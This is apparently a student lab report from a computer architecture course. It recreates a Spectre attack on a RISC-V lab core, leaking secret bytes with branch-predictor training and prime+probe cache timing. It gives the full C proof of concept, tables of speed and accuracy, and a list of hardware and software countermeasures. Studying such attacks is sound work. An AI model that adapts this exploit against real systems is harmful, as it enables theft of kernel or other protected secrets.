# CS152 Lab 3 Open Section
Richard Yan, Edison Wang
## 4.2 Recreating Spectre Attacks
### Code
```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

static inline void leak(size_t index, int shift) {/* skipped */}
static inline unsigned long get_cycles(void) {/* skipped */}
static inline void printx(unsigned char x) {/* skipped */}

uint8_t *flusher;

// mem addr: [tag] [set (6)] [byte offset (6)]
// leak_array[0] is set 000100 = 4
// leak_array[64] is set 000101 = 5
#define SET0 4
#define SET1 5

static void read_memory_byte(size_t malicious_x) {
    uint8_t result = 0;
    for (uint8_t b = 0; b < 8; b++) {
        unsigned long bit_results[2] = {0, 0};
        #pragma GCC unroll 21
        for (uint8_t tries = 0; tries < 21; tries++) {
            register unsigned long c;
            register unsigned long c_sum = 0;  // total probe time, set 4
            register unsigned long c_sum2 = 0; // total probe time, set 5
            // TRAIN: 8 in-bounds calls to bias the branch predictor
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            leak(0, 0);
            // PRIME: fill all 4 ways of sets 4 and 5 with our own lines
            volatile register uint8_t probe;
            probe = flusher[0 * 4096 + SET0 * 64];
            probe = flusher[0 * 4096 + SET1 * 64];
            probe = flusher[1 * 4096 + SET0 * 64];
            probe = flusher[1 * 4096 + SET1 * 64];
            probe = flusher[2 * 4096 + SET0 * 64];
            probe = flusher[2 * 4096 + SET1 * 64];
            probe = flusher[3 * 4096 + SET0 * 64];
            probe = flusher[3 * 4096 + SET1 * 64];
            // EXPLOIT
            leak(malicious_x, b);
            // PROBE
            // we want to check all 4 ways
            // set 5 first
            register uint8_t *addr = &flusher[SET1 * 64];
            c = get_cycles();
            probe = *addr;
            c_sum2 += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum2 += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum2 += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum2 += get_cycles() - c;
            addr -= 12352; // 3 * 4096 + 64: back to way 0 of set 4
            // now set 4
            c = get_cycles();
            probe = *addr;
            c_sum += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum += get_cycles() - c;
            addr += 4096;
            c = get_cycles();
            probe = *addr;
            c_sum += get_cycles() - c;
            // sign bit of (c_sum - c_sum2): 1 iff set 5 was slower (unsigned long is 64-bit on RV64)
            unsigned long sgn = (c_sum - c_sum2) >> 63;
            bit_results[0] += 1 - sgn;
            bit_results[1] += sgn;
            if (bit_results[0] >= 11) break;
            if (bit_results[1] >= 11) break;
        } // tries
        if (bit_results[1] > bit_results[0]) { // set 5 evicted => bit is 1
            result |= (1 << b);
        }
    }
    printx(result);
}

int main(void) {
    uint8_t flusher_region[512 * 64]; // room for a 256-line (16 KiB) aligned region
    // round flusher up to the next 16 KiB (cache-size) boundary
    flusher = (uint8_t *) (((size_t) &flusher_region[0] + 256 * 64 - 1) / (256 * 64) * (256 * 64));
    size_t leak_addr = 0x80015100L;
    size_t secret_addr = 0x8000b000L;
    for (int i = 0x00; i < 0x80; i++) {
        read_memory_byte(secret_addr - leak_addr + i);
    }
    return 0;
}
```
Shown above is the 21 tries/bit variant.
#### The setup process:
- We first allocate a known memory region with 4 times the size of the L1 D cache, also aligned to the start of the cache (so that the last 12 bits of the 0th element's address are all zeros).
- We determine the address of `leak_array` and the address of `secret`. From disassembly, `leak_array[0]` has cache index `0b000100 = 4`, `leak_array[64]` has cache index `0b000101 = 5`. We therefore know the sets the cache covert channel communicates through.
- For each secret byte, we determine the malicious `x` value by calculating the address difference between the target byte and the leak array address.
- We know that the first memory access in `sys_leak` (`leak_array[x]`) will not interfere with our probing. This is because:
  - During training, `x` is always fed as 0. This access maps to set 0 and does not interfere with sets 4 and 5, where we are probing.
  - During the exploit, `leak_array[x]` points somewhere in the secret data range. We already know `.data.secret` starts at `0x8000b000` and ends at `0x8000b080`. The span is 2 cache lines mapping to sets 0 and 1, and therefore also does not interfere with our probing.
#### The probe process:
- For each byte, we go over each of its 8 bits in order.
- For each bit, we make up to 21 attempts (any odd number works) to guess its value.
- TRAIN: We first train the branch predictor in `sys_leak` by calling with correct arguments 8 times.
- PRIME: for sets 4 and 5 we map all 4 ways to regions in the `flusher`, in 4KB intervals. This is deliberately not in a loop so as to not affect the branch predictor with loop condition branches.
- EXPLOIT: we call with malicious x value and the current bit shift. During speculative execution, either `leak_array[0]` or `leak_array[64]` gets accessed, the former evicting a way in set 4, the latter set 5.
- PROBE: we time the memory access for all 4 ways of set 5, then set 4. Address calculation is done before reading the cycle counter, so the only operation timed is the pointer dereference.
- Access times for the 4 ways are summed per set and the two sums compared; the set with the higher total gets a point.
- We terminate early once one value's score reaches a majority (11 of 21).
- At the end, the value with the higher score wins. If the bit is determined to be a 1, the corresponding bit in `result` is set. After all 8 bits, `result` holds the best guess and is printed.
#### Room for improvements:
- Earlier termination:
  - If, say, the first 5 tries all agree on one value, we may already be confident enough and need not wait for a strict majority. This saves cycles at little cost in accuracy.
- Fewer `sys_leak` calls during training:
  - Self-explanatory: 8 training calls may be more than necessary.
- Could adapt for non-hardcoded memory locations.
### Difficulties
- Cache ways
  - We originally did not notice there are 4 ways per set; priming all sets with only 1 way didn't work. Checking the config confirmed 64 sets with 4 ways each.
- Set-specific flush
  - The code originally flushed the entire cache for the PRIME step, which took forever. Since we only operate on sets 4 and 5, flushing just these 2 sets made the runtime much faster.
- Eviction detection
  - When results were wrong, we weren't sure whether eviction detection was failing or the exploit/training was. To test this, we copied the test to bare metal, removed the syscalls, and replaced the exploit call with a memory access to another array mapping to the same set as `leak_array[0]` or `leak_array[64]`. The results matching that access ruled out eviction detection as the point of failure.
- Fence
  - We thought the `fence` instruction would be a good way to count cycles with less external influence. It wasn't.
- Comparing cycle counts
  - Originally, cycle counts were summed over all tries before being compared. This was bad in two ways: an outlier could drastically skew the sums, and it did not easily allow early termination. Switching to a score-based system fixed both problems.
- Memory access pattern
  - We originally probed set 4 first, then set 5. Cycle counts looked consistently lower for set 5 when nothing was evicted, so we interleaved the sets with 4 first; the bias persisted. Our guess is a next-cache-line prefetching mechanism: section 8.2 of the [SonicBOOM](https://carrv.github.io/2020/papers/CARRV2020_paper_15_Zhao.pdf) paper also mentions a small L1 next-line prefetcher. As a result, all set 5 probes are done first.
- Unrolling
  - We unrolled most loops fearing that the branch instructions might interfere with the probe. Did it help? Probably not, but there's no harm in it.
### Speed
| Tries/bit | Cycles (all 128 bytes) | Cycles/byte |
|-----------|------------------------|-------------|
| 13        | **64329510**           | **502574**  |
| 21        | **95923915**           | **749406**  |
| 29        | **132128932**          | **1032257** |

At 1 GHz and 21 tries/bit, we are looking at under 0.1 seconds for all 128 bytes (just under 1 second at 100 MHz).
### Accuracy
#### Byte accuracy
| Tries/bit | Byte errors (of 128) | Accuracy |
|-----------|----------------------|----------|
| 13        | 41                   | 67.97%   |
| 21        | 6                    | 95.31%   |
| 29        | 4                    | 96.88%   |
#### Bit accuracy
| Tries/bit | Bit errors (of 1024) | Accuracy |
|-----------|----------------------|----------|
| 13        | 45                   | 95.6%    |
| 21        | 6                    | 99.4%    |
| 29        | 4                    | 99.6%    |
### Countermeasures
#### Hardware
- Disable speculation in s-mode or m-mode, or add a privileged instruction to toggle speculation.
  - Easy to add such a switch
  - Hurts kernel performance
- Use a victim-cache-like structure to hold lines evicted during speculation, and restore them on branch mispredict. Cache lines would need to carry a branch tag identifying which speculative branch loaded them.
  - Very difficult to implement, uses more hardware
  - Smaller performance hit
- Add enough jitter to user-mode hardware performance counters.
  - The counters have legitimate uses, so jitter could affect existing applications
  - Easy to implement and might help mitigate other timing attacks
- Kernel-specific cache.
  - More hardware, needs additional cache coherency
  - Relatively easy to implement
#### Software
- Hint the compiler that all kernel/security-critical branches (especially bounds checks) should always be predicted "not taken". This prevents speculation past the check.
  - Hardware might not support branch hints
  - Every branch must be reviewed manually, potentially a large job
  - Few complications aside from performance
- Recompile the kernel with speculative execution disabled.
  - Hardware might not support a speculation toggle
  - Hurts kernel performance
  - Easy to do
- Explicit pointer sanitization: e.g. for this case, do `x = x & 0xfff` before indexing into the array.
  - Does not cover all cases (though branch predicates might help)
  - Requires manual review of each case
  - For cases where it applies, there is little to no performance penalty